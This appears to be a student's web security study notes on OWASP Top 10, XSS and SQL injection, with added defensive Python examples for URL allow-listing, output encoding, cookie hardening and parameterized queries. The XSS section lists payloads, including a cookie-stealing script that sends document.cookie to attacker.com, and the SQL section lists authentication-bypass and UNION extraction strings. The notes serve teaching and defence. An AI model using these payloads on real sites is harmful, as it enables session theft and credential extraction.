• Web server: It hosts web apps and handles requests coming from end users (HTTP/HTTPS requests). The web server processes these requests and sends back responses (web pages/data)
  • Web application: It is a software app installed on the server that provides functionality to users through a web browser (E-commerce: Amazon, eBay — Cloud productivity: Microsoft 365, Google Workspace)
  • Web app sec practices: I- Authentication and authorization II- Input validation (preventing SQL injection/XSS by validating all user inputs) III- Secure communication (use HTTPS) IV- Secure coding (follow secure coding standards/best practices to minimize vulnerabilities during app development)
  • Web app sec testing: It evaluates apps to identify vulnerabilities and sec risks before attackers can exploit them
  • I- Vuln scanning: Automated tools scan web apps for known vulnerabilities (SQL injection, XSS) II- Penetration testing: Simulated attacks to exploit vulnerabilities and assess the effectiveness of sec controls III- Code review and static analysis: Manual/automated examination of source code to identify logic errors and misconfigurations IV- API sec testing: Assessment of APIs to ensure secure authentication, authorization, input validation, and safe data exchange
  • Web apps are built on a client-server model: I- Client side (user interface): It handles user interactions and sends requests to the server through a web browser II- Server side: It receives and processes client requests, executes the app, interacts with DB/ services, and generates responses
  • Web app architecture: I- Client-side (user interaction, responsive UX; JS is the primary language for dynamic content) II- Server-side (data processing, enhanced sec because code executes on a trusted server, data storage) III- DB IV- APIs and integrations
  • Client-Side Technologies: I- HTML II- CSS III- JS IV- Cookies and local storage
  • Server-Side Technologies: I-Web server (receives and responds to HTTP requests) II- App server (runs business logic and generates dynamic content) III- DB server (stores and manages app data) IV- Scripting lang (handles server-side processing: PHP, Python)
  • Difference Between Client-Side and Server-Side Validation: (comparison table from the original notes not reproduced here)
  • Web Request–Response Process (client–server request–response cycle): I- Request → Server: The user's browser sends an HTTP/HTTPS request to the web server II- Server → HTML + JavaScript: The server processes the request and returns an HTML page (including JS, CSS) III- Browser Downloads JS: The browser downloads the JS files referenced in the HTML IV- JS Executes in the Browser: The JS code runs in the browser to handle logic, interactions, and dynamic content V- Web Page Is Rendered: The browser renders the final web page and displays it to the user
  • Anatomy of an HTTP request (details):
  • Accept: the content that the client can understand/display
  • Accept-Encoding: the data compression algorithms used to reduce response size
  • HTTP Response Components: (diagram from the original notes not reproduced here)
  • OWASP Top 10:
  A01 — Broken Access Control: A user can access data they shouldn't, e.g., by manipulating object references (IDOR, Insecure Direct Object Reference) or by reading robots.txt to discover sensitive paths. Mitigation: Implement RBAC/ABAC with server-side checks on who may read or modify each part of the data
  A02 — Cryptographic Failures: Misuse of, or weaknesses in, the encryption protecting data in transit or at rest. Mitigation: Encrypt data in transit and at rest with strong algorithms, manage keys securely (key rotation, access control), and enforce HTTPS
  A03 — Injection: The attacker injects malicious commands that the server executes, e.g., through SQL queries or OS commands. Mitigation: Use parameterized queries/prepared statements so the server never interprets user input as part of the query or command, validate input, and run services under the least-privilege principle
  A04 — Insecure Design: Security controls missing from the app's architecture. Mitigation: Perform threat modeling during the design phase and adopt secure coding standards
  A05 — Security Misconfiguration: Systems are left with insecure features, e.g., default accounts and unnecessary services enabled. Mitigation: Enforce secure defaults and disable unused features
  A06 — Vulnerable and Outdated Components: Using software/libraries with known vulnerabilities. Mitigation: Keep components updated and monitor vulnerability databases
  A07 — Identification and Authentication Failures: Weak authentication (poor PW policies, missing MFA) lets attackers impersonate users. Mitigation: Enforce strong PWs and use MFA
  A08 — Software and Data Integrity Failures: The app trusts unverified code, e.g., insecure/unsigned software updates or a compromised CI/CD pipeline. Mitigation: Verify the integrity of software updates with digital signatures/checksums, and secure CI/CD pipelines with access controls and monitoring
  A09 — Sec Logging and Monitoring Failures: Incomplete logs and no alerting/monitoring let a breach go undetected. Mitigation: Implement centralized logging, monitor critical events/alerts, and respond to suspicious activity
  A10 — Server-Side Request Forgery (SSRF): The server is tricked into fetching data from internal/external resources through user-supplied input (URLs). Mitigation: Implement allow-list validation for URLs/destinations and disable unnecessary URL-fetching features
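One way to implement the A10 allow-list mitigation, as an added example that is not part of the original notes (the allow-listed hostnames and the internal address are constructed placeholders):

```python
# Added example (not from the original notes): allow-list validation for
# user-supplied URLs, the A10 (SSRF) mitigation above. The hostnames in
# ALLOWED_HOSTS are constructed placeholders, not real services.
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}   # constructed allow-list
ALLOWED_PORTS = {None, 80, 443}                            # None = scheme default


def is_allowed_url(url: str) -> bool:
    """Return True only if url points at an allow-listed destination.

    Strict on purpose: an unknown scheme, credentials in the authority part
    (the "allowed-host@real-host" trick), a non-standard port, or any host
    that is not an exact allow-list entry is rejected.
    """
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname          # already lower-cased by urlsplit
    if host is None or host not in ALLOWED_HOSTS:
        return False
    return port in ALLOWED_PORTS


def check_urls(urls):
    """Map each candidate URL to its allow-list decision."""
    return {u: is_allowed_url(u) for u in urls}


if __name__ == "__main__":
    # Constructed inputs: one legitimate fetch target and several that a
    # server-side fetcher must refuse.
    for url, ok in check_urls([
        "https://api.example.com/data",
        "https://api.example.com@evil.test/",      # host is really evil.test
        "http://10.0.0.5/admin",                   # constructed internal address
        "file:///etc/passwd",                      # non-HTTP scheme
        "https://api.example.com:8443/data",       # unexpected port
    ]).items():
        print("allow " if ok else "reject", url)
```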
  • Brute force protection (Prevention): Implement bot-detection/human-verification mechanisms (CAPTCHA) after a certain number of failed login attempts (after two/three failures)
  • Cross-Site Scripting (XSS): It is a vuln that allows attackers to inject malicious client-side scripts (JS) into web pages viewed by other users. These scripts can bypass access controls, hijack user sessions, steal cookies/tokens, and deface websites
  • XSS Types: I- Stored (Persistent) XSS: The attacker injects the payload into server-side storage (DB). When a victim visits the affected page, the malicious script executes automatically, Ex: Malicious script saved in a comment section II- Reflected (Non-Persistent) XSS: The payload isn't stored on the server; it's reflected directly from the request into the response and requires user interaction (clicking a malicious link) III- DOM-Based XSS: It runs on the client side, where JavaScript modifies the DOM using untrusted input (URL parameters), so the server never sees the attack and the browser executes it
  • XSS mitigation: I- Input validation II- Implementing Content Security Policies (CSPs) — Restricts where scripts can be loaded from III- Output Encoding — Encode data before rendering it in HTML/JS
  • Common XSS Payloads:
  I- Basic Script Injection:
  <script>alert('XSS')</script>
  II- Image Error Event:
  <img src=x onerror=alert('XSS')>
  III- Cookie Stealing (sends the victim's cookies to an attacker-controlled host):
  <script>
  fetch('https://attacker.com/?c=' + document.cookie)
  </script>
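The output-encoding and CSP mitigations applied to the three payloads above, as an added example that is not part of the original notes; the comment data and the policy string are assumptions chosen for the demo:

```python
# Added example (not from the original notes): output encoding for the HTML
# and JavaScript contexts plus a Content-Security-Policy header, the server-
# side mitigations listed above. The rendered comments are constructed and
# include the three payloads from the notes.
import html
import json

# Script execution limited to same-origin files; inline <script> blocks and
# inline event handlers such as onerror=... are blocked by this policy.
SECURITY_HEADERS = {
    "Content-Security-Policy":
        "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
}


def encode_for_html(untrusted: str) -> str:
    """Encode text for an HTML body or a quoted attribute: & < > " ' become entities."""
    return html.escape(untrusted, quote=True)


def encode_for_js(value) -> str:
    """Encode data embedded inside a <script> block as a JSON literal.

    '<' and '>' are escaped as \\u003c / \\u003e so a value containing
    '</script>' cannot terminate the block; JS still parses the same value.
    """
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_comment(author: str, body: str) -> str:
    """Render one stored comment with every untrusted field encoded for its context."""
    return (f'<div class="comment" data-author="{encode_for_html(author)}">'
            f'{encode_for_html(body)}</div>')


# Constructed stored comments (the "comment section" case under Stored XSS)
SAMPLE_COMMENTS = [
    ("alice", "Nice post!"),
    ("mallory", "<script>alert('XSS')</script>"),
    ("mallory", "<img src=x onerror=alert('XSS')>"),
    ("mallory", "<script>fetch('https://attacker.com/?c=' + document.cookie)</script>"),
]


def render_comments(comments) -> str:
    """Render every comment; no raw '<' from user input survives into the page."""
    return "\n".join(render_comment(a, b) for a, b in comments)


if __name__ == "__main__":
    for name, value in SECURITY_HEADERS.items():
        print(f"{name}: {value}")
    print(render_comments(SAMPLE_COMMENTS))
```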
  • Where Web App Data Is Stored: I- Server (User ID, auth status logged in/out) → Sessions II- Browser (session ID, Token) → Cookies (User's browser)
  • The actual sensitive data stays on the server, not in the browser
  • Reducing Session Hijacking: Mark authentication cookies as HttpOnly so JS can't access them. So, document.cookie won't return these cookies, preventing attackers from stealing session IDs via XSS
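An added example, not from the original notes, that builds an HttpOnly/Secure/SameSite session cookie and audits Set-Cookie headers for the flags that limit session hijacking; the cookie names, session id and response are constructed:

```python
# Added example (not from the original notes): emit a hardened session cookie
# and audit Set-Cookie headers for the attributes that limit session hijacking.
# The cookie names, values and the response header block are constructed.

REQUIRED_ATTRS = ("HttpOnly", "Secure", "SameSite")


def session_cookie_header(session_id: str, max_age: int = 3600) -> str:
    """Build the Set-Cookie value for an auth cookie with the hardening flags set.

    HttpOnly keeps it out of document.cookie, Secure restricts it to HTTPS,
    SameSite=Lax withholds it from most cross-site requests, and the __Host-
    prefix makes browsers require Secure, Path=/ and no Domain attribute.
    """
    return (f"__Host-session={session_id}; Path=/; Max-Age={max_age}; "
            f"Secure; HttpOnly; SameSite=Lax")


def audit_set_cookie(header_value: str) -> dict:
    """Parse one Set-Cookie value and list the hardening attributes it lacks."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].partition("=")[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()   # attribute names are case-insensitive
    missing = [a for a in REQUIRED_ATTRS if a.lower() not in attrs]
    return {"name": name, "missing": missing}


def audit_response(raw_headers: str) -> list:
    """Audit every Set-Cookie line in a raw HTTP response header block."""
    findings = []
    for line in raw_headers.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "set-cookie":
            findings.append(audit_set_cookie(value))
    return findings


# Constructed response: one hardened cookie, one that any XSS could read
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    f"Set-Cookie: {session_cookie_header('c0ffee')}\r\n"   # constructed session id
    "Set-Cookie: legacy_session=abc123; Path=/\r\n"
    "Content-Type: text/html\r\n"
)

if __name__ == "__main__":
    for f in audit_response(SAMPLE_RESPONSE):
        print(f["name"], "OK" if not f["missing"] else "missing " + ", ".join(f["missing"]))
```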
  • The difference between XSS and SQL Injection: (comparison table from the original notes not reproduced here)
  • SQL Injection Types: I- In-band SQLi: The attacker uses the same channel to inject malicious SQL and retrieve results. (Error-based: The attacker triggers DB error messages, and the errors reveal the DB type and table/column names), (UNION-based: uses the UNION operator to attach a 2nd query to a legitimate one, allowing the attacker to extract usernames/PWs) II- Blind SQLi (Inferential): When no DB output is shown, attackers infer info indirectly from the app's behavior. (Boolean-based: infers data by observing TRUE/FALSE response changes), (Time-based: uses response delays to determine whether a condition is true) III- Out-of-band SQLi: The attacker extracts data by making the DB communicate with an attacker-controlled external server (DNS/HTTP requests) when direct responses are unavailable
  • Common SQL Injection Payloads:
  I- Basic Authentication Bypass:
  ' OR '1'='1' --
  II- Comment-Based Injection:
  ' OR 1=1 #
  Or
  ' OR 1=1 --
  III- Union-Based Data Extraction:
  ' UNION SELECT username, password FROM users --
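The concatenated query that the payloads above defeat, beside the parameterized query that neutralizes them, as an added example not from the original notes; it uses an in-memory SQLite database with a constructed user, and only the '--' payloads are exercised because '#' is MySQL comment syntax that SQLite does not accept:

```python
# Added example (not from the original notes): a login query built by string
# concatenation, which the payloads above defeat, beside the parameterized
# version that treats the same input as plain data. In-memory SQLite with a
# constructed user; passwords are stored in clear only to keep the demo short.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")   # constructed
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    # User input is pasted into the SQL text, so quotes and comment markers
    # in the input change the query's grammar.
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    # Placeholders: the driver binds the values after parsing, so the input
    # can never become SQL tokens.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


PAYLOADS = ["' OR '1'='1' --", "' OR 1=1 --"]   # the '--' payloads from the notes


def compare(conn) -> dict:
    """Run each payload as the username against both logins; True means 'logged in'."""
    return {p: (login_vulnerable(conn, p, "wrong"), login_safe(conn, p, "wrong"))
            for p in PAYLOADS}


if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, safe) in compare(db).items():
        print(f"{payload!r:22} vulnerable={vuln} parameterized={safe}")
```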

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

[If I have done well, it is from Allah; and if I have erred, it is from myself and Satan. Remember us in your righteous supplications.]